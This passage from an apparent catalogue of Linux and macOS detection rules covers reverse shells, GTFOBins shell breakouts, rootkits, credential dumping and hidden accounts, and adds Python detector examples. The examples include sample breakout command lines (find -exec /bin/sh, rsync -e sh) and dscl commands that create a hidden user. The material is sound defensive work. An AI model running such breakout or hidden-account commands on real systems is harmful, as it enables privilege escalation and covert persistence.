The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
|
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://github.com/Azure/Azure-Sentinel/pull/3059 |
OMIGOD SCX RunAsProvider ExecuteShellCommand |
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.
SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
|
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://github.com/Azure/Azure-Sentinel/pull/3059 |
Potential Perl Reverse Shell Execution |
Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity |
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/ |
Potential PHP Reverse Shell |
Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets.
Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
|
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/ |
Pnscan Binary Data Transmission Activity |
Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.
This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
|
https://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence, https://intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf, https://regex101.com/r/RugQYK/1, https://www.virustotal.com/gui/file/beddf70a7bab805f0c0b69ac0989db6755949f9f68525c08cb874988353f78a9/content |
Connection Proxy |
Detects setting proxy configuration |
https://attack.mitre.org/techniques/T1090/ |
Python Spawning Pretty TTY Via PTY Module |
Detects a python process calling the pty module in order to spawn a pseudo-terminal, which could be indicative of potential reverse shell activity.
|
https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ |
Python Reverse Shell Execution Via PTY And Socket Modules |
Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
|
https://www.revshells.com/ |
Inline Python Execution - Spawn Shell Via OS System Library |
Detects execution of inline Python code via the "-c" flag in order to call the "system" function from the "os" module and spawn a shell.
|
https://gtfobins.github.io/gtfobins/python/#shell |
Remote Access Tool - Team Viewer Session Started On Linux Host |
Detects the command line executed when TeamViewer starts a session initiated by a remote host.
Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
|
Internal Research |
Linux Remote System Discovery |
Detects the enumeration of other remote systems. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md |
Linux Package Uninstall |
Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg". |
https://sysdig.com/blog/mitre-defense-evasion-falco, https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command, https://linuxhint.com/uninstall_yum_package/, https://linuxhint.com/uninstall-debian-packages/ |
Shell Execution via Rsync - Linux |
Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
|
https://gtfobins.github.io/gtfobins/rsync/#shell |
Suspicious Invocation of Shell via Rsync |
Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
|
https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/, https://gist.github.com/Neo23x0/a20436375a1e26524931dd8ea1a3af10 |
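The "Shell Invocation/Execution via ..." rules above (apt, awk, capsh, env, find, flock, gcc, git, nice, rsync, ssh) and the rsync CVE-2024-12084 rule all hinge on one process-tree question: did a tool that has no business spawning a shell spawn one? The example below is added here for illustration and is not the rule set's own logic. It distinguishes two cases a practitioner has to handle separately: tools that fork a shell as a child (the shell shows up with the tool as parent image) and tools such as env, nice and capsh that execve() the shell in place, where only the launcher's own argv reveals the intent. It also encodes the rsync exception, where a shell child is expected when "-e"/"--rsh" was given. The events are constructed; the field names (image, cmdline, parent_image, parent_cmdline) are an assumed schema, not a particular product's.

```python
import re
import shlex

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

# Tools that fork a shell: the shell appears as a new process whose parent is the tool.
FORKING_PARENTS = {"apt", "apt-get", "awk", "gawk", "mawk", "nawk", "find", "flock",
                   "gcc", "c89", "c99", "git", "rsync", "ssh"}
# Tools that execve() the shell in place: the shell never appears as their child.
EXEC_LAUNCHERS = {"env", "nice", "capsh"}

# "-e ssh", "-ave ssh", "--rsh=ssh": rsync was told to run a remote shell command.
RSYNC_E_CLUSTER = re.compile(r"-[a-zA-Z]*e")


def basename(path):
    return path.rsplit("/", 1)[-1]


def argv_of(cmdline):
    try:
        return shlex.split(cmdline)
    except ValueError:        # unbalanced quotes in a hostile command line
        return cmdline.split()


def rsync_has_remote_shell_flag(argv):
    """True if a shell child of rsync is expected because -e/--rsh was passed.
    The server-side option string (e.g. "-logDtpre.iLsfxC") is not a match."""
    return any(a.startswith("--rsh") or RSYNC_E_CLUSTER.fullmatch(a) for a in argv[1:])


def classify(event):
    """Return a rule-style label for a process creation event, or None."""
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    argv = argv_of(event["cmdline"])
    if image in SHELLS and parent in FORKING_PARENTS:
        if parent == "rsync" and not rsync_has_remote_shell_flag(argv_of(event["parent_cmdline"])):
            return "suspicious-shell-via-rsync-without-e"   # CVE-2024-12084 indicator
        return "shell-via-" + parent
    if image in EXEC_LAUNCHERS:
        if any(basename(a) in SHELLS for a in argv[1:]):
            return "shell-via-" + image
        if image == "capsh" and "--" in argv[1:]:           # capsh -- defaults to a shell
            return "shell-via-capsh"
    return None


# Constructed sample events.
SAMPLE_EVENTS = [
    {"image": "/bin/sh", "cmdline": "sh",
     "parent_image": "/usr/bin/find", "parent_cmdline": "find . -exec /bin/sh ; -quit"},
    {"image": "/bin/sh", "cmdline": 'sh -c "sh 0<&2 1>&2"',
     "parent_image": "/usr/bin/rsync",
     "parent_cmdline": "rsync -e 'sh -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null"},
    {"image": "/bin/sh", "cmdline": "sh -c id",
     "parent_image": "/usr/bin/rsync",
     "parent_cmdline": "rsync --server --sender -logDtpre.iLsfxC . /srv/data"},
    {"image": "/usr/bin/env", "cmdline": "env /bin/sh",
     "parent_image": "/bin/bash", "parent_cmdline": "bash"},
    {"image": "/bin/sh", "cmdline": "sh -c ls",
     "parent_image": "/usr/bin/make", "parent_cmdline": "make all"},
    {"image": "/usr/bin/env", "cmdline": "env python3 deploy.py",
     "parent_image": "/bin/bash", "parent_cmdline": "bash"},
]


def run_samples():
    return [classify(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for event, label in zip(SAMPLE_EVENTS, run_samples()):
        print(label, "<-", event["parent_cmdline"], "=>", event["cmdline"])
```

Breakouts that go through a pager (apt-get changelog, git help, then "!/bin/sh" in less) show less, not apt or git, as the parent; cover those by matching the pager's parent one level up, or by the tool's command line, rather than extending this list.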
Potential Ruby Reverse Shell |
Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell |
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/ |
Scheduled Cron Task/Job - Linux |
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md |
Security Software Discovery - Linux |
Detects usage of system utilities (only grep and egrep for now) to discover security software |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md |
Disabling Security Tools |
Detects disabling security tools |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md |
Disable Or Stop Services |
Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services |
https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html |
Setuid and Setgid |
Detects suspicious changes of file ownership and permissions, such as setting the setuid or setgid bits, via the chown and chmod commands |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md, https://attack.mitre.org/techniques/T1548/001/ |
Shell Invocation Via Ssh - Linux |
Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
|
https://gtfobins.github.io/gtfobins/ssh/, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html |
Potential Linux Amazon SSM Agent Hijacking |
Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. |
https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan, https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/, https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/ |
Sudo Privilege Escalation CVE-2019-14287 |
Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 |
https://www.openwall.com/lists/oss-security/2019/10/14/1, https://access.redhat.com/security/cve/cve-2019-14287, https://twitter.com/matthieugarin/status/1183970598210412546 |
Chmod Suspicious Directory |
Detects chmod targeting files in abnormal directory paths. |
https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md |
Container Residence Discovery Via Proc Virtual FS |
Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem |
https://blog.skyplabs.net/posts/container-detection/, https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker |
Suspicious Curl File Upload - Linux |
Detects a suspicious curl process start that adds a file to a web request |
https://twitter.com/d1r4c/status/1279042657508081664, https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file, https://curl.se/docs/manpage.html, https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html |
Suspicious Curl Change User Agents - Linux |
Detects a suspicious curl process start on Linux with user-agent options set |
https://curl.se/docs/manpage.html |
Docker Container Discovery Via Dockerenv Listing |
Detects listing or reading of the ".dockerenv" file, which can be a sign of potential container discovery |
https://blog.skyplabs.net/posts/container-detection/, https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker |
Potentially Suspicious Execution From Tmp Folder |
Detects a potentially suspicious execution of a process located in the '/tmp/' folder |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Potential Discovery Activity Using Find - Linux |
Detects usage of "find" binary in a suspicious manner to perform discovery |
https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes |
Suspicious Git Clone - Linux |
Detects execution of "git" to clone a remote repository whose name contains suspicious keywords |
https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt |
History File Deletion |
Detects events in which a history file gets deleted, e.g. ~/.bash_history, to remove traces of malicious activity |
https://github.com/sleventyeleven/linuxprivchecker/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md |
Print History File Contents |
Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance |
https://github.com/sleventyeleven/linuxprivchecker/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md |
Linux HackTool Execution |
Detects known hacktool execution based on image name. |
https://github.com/Gui774ume/ebpfkit, https://github.com/pathtofile/bad-bpf, https://github.com/carlospolop/PEASS-ng, https://github.com/t3l3machus/hoaxshell, https://github.com/t3l3machus/Villain, https://github.com/HavocFramework/Havoc, https://github.com/1N3/Sn1per, https://github.com/Ne0nd0g/merlin, https://github.com/Pennyw0rth/NetExec/ |
Potential Container Discovery Via Inodes Listing |
Detects listing of the inodes of the "/" directory to determine whether the process is running inside a container. |
https://blog.skyplabs.net/posts/container-detection/, https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker |
Interactive Bash Suspicious Children |
Detects suspicious interactive bash as a parent to rather uncommon child processes |
Internal Research |
Suspicious Java Children Processes |
Detects java process spawning suspicious children |
https://www.tecmint.com/different-types-of-linux-shells/ |
Linux Network Service Scanning Tools Execution |
Detects execution of network scanning and reconnaissance tools. These tools can be used for the enumeration of local or remote network services, for example. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md, https://github.com/projectdiscovery/naabu, https://github.com/Tib3rius/AutoRecon |
Linux Shell Pipe to Shell |
Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell |
Internal Research |
Linux Recon Indicators |
Detects events with patterns found in commands used for reconnaissance on linux systems |
https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py |
Potential Suspicious Change To Sensitive/Critical Files |
Detects changes to sensitive and critical files, i.e. files that are not expected to change on a Linux system without planning. |
https://learn.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor |
Execution Of Script Located In Potentially Suspicious Directory |
Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc. |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Shell Execution Of Process Located In Tmp Directory |
Detects execution of shells from a parent process located in a temporary (/tmp) directory |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
System Information Discovery |
Detects system information discovery commands |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md |
System Network Connections Discovery - Linux |
Detects usage of system utilities to discover system network connections |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md |
System Network Discovery - Linux |
Detects enumeration of local network configuration |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md |
Touch Suspicious Service File |
Detects usage of the "touch" utility on a service file. |
https://blogs.blackberry.com/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 |
Triple Cross eBPF Rootkit Execve Hijack |
Detects execution of the file "execve_hijack", which is used by the Triple Cross rootkit as a way to elevate privileges |
https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 |
Triple Cross eBPF Rootkit Install Commands |
Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script |
https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh |
User Has Been Deleted Via Userdel |
Detects execution of the "userdel" binary, which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks |
https://linuxize.com/post/how-to-delete-group-in-linux/, https://www.cyberciti.biz/faq/linux-remove-user-command/, https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/, https://linux.die.net/man/8/userdel |
User Added To Root/Sudoers Group Using Usermod |
Detects usage of the "usermod" binary to add users to the root or sudoers groups |
https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/, https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/ |
Vim GTFOBin Abuse - Linux |
Detects the use of "vim" and its sibling commands ("rvim", "vimdiff") to execute a shell or proxy commands.
Such behavior may be associated with privilege escalation, unauthorized command execution, or breaking out of restricted environments.
|
https://gtfobins.github.io/gtfobins/vim/, https://gtfobins.github.io/gtfobins/rvim/, https://gtfobins.github.io/gtfobins/vimdiff/ |
Linux Webshell Indicators |
Detects suspicious sub processes of web server processes |
https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/, https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF |
Download File To Potentially Suspicious Directory Via Wget |
Detects the use of wget to download content to a suspicious directory |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Potential Xterm Reverse Shell |
Detects usage of "xterm" as a potential reverse shell tunnel |
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/ |
MacOS Emond Launch Daemon |
Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md, https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 |
Startup Item File Created - MacOS |
Detects the creation of a startup item plist file. Startup items are executed automatically at boot initialization, and adversaries may use them to establish persistence.
Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md, https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html |
MacOS Scripting Interpreter AppleScript |
Detects execution of AppleScript, the macOS scripting language. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md, https://redcanary.com/blog/applescript/ |
Decode Base64 Encoded Text - MacOS |
Detects usage of base64 utility to decode arbitrary base64-encoded text |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md |
Binary Padding - MacOS |
Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to append junk data to a file. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md, https://linux.die.net/man/1/truncate, https://linux.die.net/man/1/dd |
File Time Attribute Change |
Detects changes to file time attributes made to hide new files or modifications to existing files |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md |
Hidden Flag Set On File/Directory Via Chflags - MacOS |
Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS.
When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
|
https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/, https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/, https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf, https://ss64.com/mac/chflags.html |
Indicator Removal on Host - Clear Mac System Logs |
Detects deletion of local audit logs |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md |
Clipboard Data Collection Via OSAScript |
Detects possible collection of data from the clipboard via execution of the osascript binary |
https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/ |
Creation Of A Local User Account |
Detects the creation of a new user account. Such accounts may provide persistence without requiring remote access tools to be deployed on the system. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md, https://ss64.com/osx/sysadminctl.html |
Hidden User Creation |
Detects creation of a hidden user account on macOS (UniqueID < 500 or the IsHidden attribute set) |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md |
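As an added example (not part of this catalogue or the Sigma rule), the following Python checks "dscl ... -create" command lines for the two hidden-user conditions named above: a UniqueID below 500, or IsHidden set to a true value. The numeric comparison is something a plain string-match rule cannot express directly, which is why it is shown as code. The sample command lines are constructed, and the assumption that a leading "sudo" should be ignored is mine.

```python
import shlex

# Values macOS treats as "true" for IsHidden (assumed set).
HIDDEN_TRUE = {"1", "true", "yes"}
# UIDs below 500 are reserved for system accounts and are not shown on the login window.
HIDDEN_UID_LIMIT = 500


def _strip_sudo(tokens):
    """Drop a leading 'sudo' so the real binary is at index 0 (assumption)."""
    if tokens and tokens[0].rsplit("/", 1)[-1] == "sudo":
        return tokens[1:]
    return tokens


def parse_dscl_create(cmdline):
    """Return (record_path, attribute, value) for
    'dscl <node> -create <path> <attribute> <value>', or None otherwise."""
    try:
        tokens = _strip_sudo(shlex.split(cmdline))
    except ValueError:  # unbalanced quotes
        return None
    if not tokens or tokens[0].rsplit("/", 1)[-1] != "dscl":
        return None
    if "-create" not in tokens:
        return None
    args = tokens[tokens.index("-create") + 1:]
    if len(args) < 3:  # '-create <path>' alone creates an empty record
        return None
    return args[0], args[1], args[2]


def is_hidden_user_creation(cmdline):
    """True when a user record is created with UniqueID < 500 or IsHidden true."""
    parsed = parse_dscl_create(cmdline)
    if parsed is None:
        return False
    path, attr, value = parsed
    if not path.startswith("/Users/"):
        return False
    if attr == "IsHidden":
        return value.lower() in HIDDEN_TRUE
    if attr == "UniqueID":
        try:
            return int(value) < HIDDEN_UID_LIMIT
        except ValueError:
            return False
    return False


# Constructed sample command lines (not real telemetry).
SAMPLE_CMDLINES = [
    "sudo dscl . -create /Users/svcbackup UniqueID 333",
    "dscl . -create /Users/svcbackup IsHidden 1",
    "/usr/bin/dscl . -create /Users/alice UniqueID 1042",        # normal UID
    "dscl . -create /Users/alice RealName 'Alice Example'",      # unrelated attribute
    "dscl . -read /Users/alice UniqueID",                        # read, not create
    "sudo dscl . -create /Groups/backup PrimaryGroupID 333",     # group, not user
]


def scan(cmdlines):
    return [c for c in cmdlines if is_hidden_user_creation(c)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_CMDLINES):
        print("hidden user creation:", hit)
```

Only the first two samples match. Note that an adversary can split the work across calls (create the record first, set UniqueID later), so each "-create" invocation has to be evaluated on its own rather than only the one that creates the record.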
Credentials from Password Stores - Keychain |
Detects password dumps from the Keychain |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md, https://gist.github.com/Capybara/6228955 |
System Integrity Protection (SIP) Disabled |
Detects the use of csrutil to disable System Integrity Protection (SIP). This technique is used in post-exploitation scenarios.
|
https://ss64.com/osx/csrutil.html, https://objective-see.org/blog/blog_0x6D.html, https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/, https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior |
System Integrity Protection (SIP) Enumeration |
Detects the use of csrutil to view the System Integrity Protection (SIP) status. This technique is used in post-exploitation scenarios.
|
https://ss64.com/osx/csrutil.html, https://objective-see.org/blog/blog_0x6D.html, https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/, https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior |
Disable Security Tools |
Detects disabling security tools |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
User Added To Admin Group Via Dscl |
Detects attempts to create and add an account to the admin group via "dscl" |
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admin-privileges---macos, https://ss64.com/osx/dscl.html |
User Added To Admin Group Via DseditGroup |
Detects attempts to create and/or add an account to the admin group, thus granting admin privileges. |
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos, https://ss64.com/osx/dseditgroup.html |
Root Account Enable Via Dsenableroot |
Detects attempts to enable the root account via "dsenableroot" |
https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md, https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml, https://ss64.com/osx/dsenableroot.html |
File and Directory Discovery - MacOS |
Detects usage of system utilities to discover files and directories |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md |
Credentials In Files |
Detects attempts to extract passwords from files with grep and LaZagne |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md |
GUI Input Capture - macOS |
Detects attempts to use system dialog prompts to capture user credentials |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md, https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/ |
Disk Image Creation Via Hdiutil - MacOS |
Detects the execution of the hdiutil utility in order to create a disk image. |
https://www.loobins.io/binaries/hdiutil/, https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/, https://ss64.com/mac/hdiutil.html |
Disk Image Mounting Via Hdiutil - MacOS |
Detects the execution of the hdiutil utility in order to mount disk images. |
https://www.loobins.io/binaries/hdiutil/, https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/, https://ss64.com/mac/hdiutil.html |
Suspicious Installer Package Child Process |
Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters |
https://redcanary.com/blog/clipping-silver-sparrows-wings/, https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml |
System Information Discovery Using Ioreg |
Detects the use of "ioreg", which shows I/O Kit registry information.
This process is used for system information discovery.
It has been observed in the wild being called directly or via bash and grep to look for specific strings.
|
https://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior, https://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior, https://www.virustotal.com/gui/file/5907d59ec1303cfb5c0a0f4aaca3efc0830707d86c732ba6b9e842b5730b95dc/behavior, https://www.trendmicro.com/en_ph/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html |
JAMF MDM Potential Suspicious Child Process |
Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent. |
https://github.com/MythicAgents/typhon/, https://www.zoocoup.org/casper/jamf_cheatsheet.pdf, https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html |
JAMF MDM Execution |
Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control policies.
|
https://github.com/MythicAgents/typhon/, https://www.zoocoup.org/casper/jamf_cheatsheet.pdf, https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html |
JXA In-memory Execution Via OSAScript |
Detects possible malicious execution of JXA in-memory via OSAScript |
https://redcanary.com/blog/applescript/ |
Launch Agent/Daemon Execution Via Launchctl |
Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS. |
